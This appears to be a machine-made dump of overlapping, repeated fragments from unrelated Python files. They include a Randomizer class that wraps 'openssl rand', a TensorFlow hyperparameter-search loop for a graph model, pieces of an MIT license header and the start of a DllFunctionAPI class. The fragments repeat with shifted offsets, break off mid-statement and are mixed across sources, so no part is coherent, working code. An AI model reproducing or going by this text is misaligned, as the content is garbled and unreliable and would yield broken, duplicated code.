self.__known_generator_map: raise", "if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int)", "@property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length:", "'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex' class UnknownRandomizationMethodError(RuntimeError):", "registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64,", "known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method", "def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if", "def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length:", "subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex' class", "List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not in", "} @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str,", "randomize(self, method: str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return", "import subprocess from functools import lru_cache from typing import Callable, Dict, List from", "@registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX:", "UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64',", "return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex'", "self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method:", "RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self,", "Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map:" ]
[ "data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True", "{2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,", "for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d", "base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir])", "from data_loader import data_helper as helper # capture the config path from the", "{3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator", "arguments # then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json')", "from Utils.utils import get_args from data_loader import data_helper as helper # capture the", "instance of the model you want model = invariant_basic(config, data) # create trainer", "a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth =", "Utils.utils import get_args from data_loader import data_helper as helper # capture the config", "DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config", "config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for", "gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance of the model", "trainer = Trainer(sess, model, data, config) # here you train your model acc,", "os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir])", "Utils.config import process_config from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils", "data_loader import data_helper as helper # capture the config path from the run", "config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir", "summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) #", "= trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\")", "config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import", "fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir", "pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std =", "all the previous components to it trainer = Trainer(sess, model, data, config) #", "model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def", "from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from", "Trainer from Utils.config import process_config from Utils.dirs import create_dirs from Utils import doc_utils", "path from the run arguments # then process the json configuration file config", "experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i", "generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig =", "Trainer(sess, model, data, config) # here you train your model acc, loss, _", "= {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data", "tf.Session(config=gpuconfig) # create an instance of the model you want model = invariant_basic(config,", "[0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5],", "_ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df =", "pass all the previous components to it trainer = Trainer(sess, model, data, config)", "lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for a3d", "and pass all the previous components to it trainer = Trainer(sess, model, data,", "= config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance of", "a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d", "your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully", "model you want model = invariant_basic(config, data) # create trainer and pass all", "= curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d", "+ \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d =", "in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully", "a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate", "np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std = {0}\".format(np.std(acc))) return np.mean(acc)", "import create_dirs from Utils import doc_utils from Utils.utils import get_args from data_loader import", "process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as", "base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config)", "json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1", "as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments", "= a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc", "tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"])", "= a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth", "as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy", "as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name", "data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True,", "here you train your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import", "= lr config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name =", "config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir =", "# then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"]", "create trainer and pass all the previous components to it trainer = Trainer(sess,", "run arguments # then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple", "file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf", "sess = tf.Session(config=gpuconfig) # create an instance of the model you want model", "= tf.Session(config=gpuconfig) # create an instance of the model you want model =", "it trainer = Trainer(sess, model, data, config) # here you train your model", "= {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d,", "config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr,", "create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]:", "tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir,", "sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc =", "config) # here you train your model acc, loss, _ = trainer.train() sess.close()", "# create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in", "data = DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d", "invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import create_dirs", "doc_utils from Utils.utils import get_args from data_loader import data_helper as helper # capture", "configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as", "process_config from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import get_args", "trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc", "config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name", "trainer and pass all the previous components to it trainer = Trainer(sess, model,", "data) # create trainer and pass all the previous components to it trainer", "fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d =", "df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean", "= pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std", "components to it trainer = Trainer(sess, model, data, config) # here you train", "lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc =", "the previous components to it trainer = Trainer(sess, model, data, config) # here", "import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create", "\" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc", "for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d", "from Utils import doc_utils from Utils.utils import get_args from data_loader import data_helper as", "range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in", "[10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture =", "import get_args from data_loader import data_helper as helper # capture the config path", "fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc", "= a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name + \"", "the model you want model = invariant_basic(config, data) # create trainer and pass", "previous components to it trainer = Trainer(sess, model, data, config) # here you", "models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs", "tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name =", "a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d", "config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr", "model = invariant_basic(config, data) # create trainer and pass all the previous components", "import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name", "config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name +", "helper # capture the config path from the run arguments # then process", "import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\")", "pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy =", "an instance of the model you want model = invariant_basic(config, data) # create", "pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean", "import Trainer from Utils.config import process_config from Utils.dirs import create_dirs from Utils import", "import process_config from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import", "True sess = tf.Session(config=gpuconfig) # create an instance of the model you want", "the config path from the run arguments # then process the json configuration", "= config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data", "config.architecture = a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d =", "you want model = invariant_basic(config, data) # create trainer and pass all the", "os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder", "trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import create_dirs from Utils", "dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i in", "fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess =", "data, config) # here you train your model acc, loss, _ = trainer.train()", "from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import get_args from", "to it trainer = Trainer(sess, model, data, config) # here you train your", "{3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully))", "DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]:", "create_dirs from Utils import doc_utils from Utils.utils import get_args from data_loader import data_helper", "import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import", "base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d", "= {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr,", "capture the config path from the run arguments # then process the json", "curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d =", "data_helper as helper # capture the config path from the run arguments #", "create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc =", "of the model you want model = invariant_basic(config, data) # create trainer and", "inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1)", "a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc =", "config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data =", "from the run arguments # then process the json configuration file config =", "the run arguments # then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn", "for i in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]:", "the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import", "in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for a3d in", "[[5],[10]]: for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr", "= fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully)", "from Utils.config import process_config from Utils.dirs import create_dirs from Utils import doc_utils from", "gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance", "create an instance of the model you want model = invariant_basic(config, data) #", "def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc)))", "np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments dirs", "# capture the config path from the run arguments # then process the", "= os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir", "# here you train your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph()", "numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the", "Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import get_args from data_loader", "train your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as", "get_args from data_loader import data_helper as helper # capture the config path from", "for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for", "# create trainer and pass all the previous components to it trainer =", "in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc =", "[[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture", "want model = invariant_basic(config, data) # create trainer and pass all the previous", "tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create", "as helper # capture the config path from the run arguments # then", "data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config", "the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for", "model, data, config) # here you train your model acc, loss, _ =", "create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i)", "from data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from", "create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d", "loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df", "acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir):", "= config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for", "config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance of the", "data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list", "= DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in", "acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std = {0}\".format(np.std(acc)))", "in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate =", "from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import create_dirs from", "# create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc", "= {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create", "lr config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name", "= tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) #", "then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] =", "a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr", "you train your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas", "for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]:", "your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd", "= True sess = tf.Session(config=gpuconfig) # create an instance of the model you", "multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as np", "{2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your", "config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d", "in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d", "# create an instance of the model you want model = invariant_basic(config, data)", "= np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std = {0}\".format(np.std(acc))) return", "import doc_utils from Utils.utils import get_args from data_loader import data_helper as helper #", "a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir", "os from data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer", "a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list =", "= config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder =", "invariant_basic(config, data) # create trainer and pass all the previous components to it", "\"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) #", "import data_helper as helper # capture the config path from the run arguments", "data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig", "= fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess", "a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d =", "data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)", "import os from data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import", "import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import", "i in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for", "curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir =", "= base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder,", "tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name #", "Utils import doc_utils from Utils.utils import get_args from data_loader import data_helper as helper", "= invariant_basic(config, data) # create trainer and pass all the previous components to", "[[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc = fully", "= a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list", "process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu", "= process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy", "= Trainer(sess, model, data, config) # here you train your model acc, loss,", "log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an", "gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig)", "config path from the run arguments # then process the json configuration file" ]
[ "NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE", "publish, distribute, sublicense, and/or sell # copies of the Software, and to permit", "int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self):", "# Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright", "MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC # #", "software and associated documentation files (the \"Software\"), to deal # in the Software", "copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED", "\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT", "TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.", "WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT", "(MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is", "OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN", "CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #", "portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT", "IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def", "do so, subject to the following conditions: # # The above copyright notice", "# Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is hereby granted,", "EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,", "get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams =", "------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode", "Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # #", "and to permit persons to whom the Software is # furnished to do", "use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the", "the Software without restriction, including without limitation the rights # to use, copy,", "OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION", "ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN", "without restriction, including without limitation the rights # to use, copy, modify, merge,", "the following conditions: # # The above copyright notice and this permission notice", "THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES 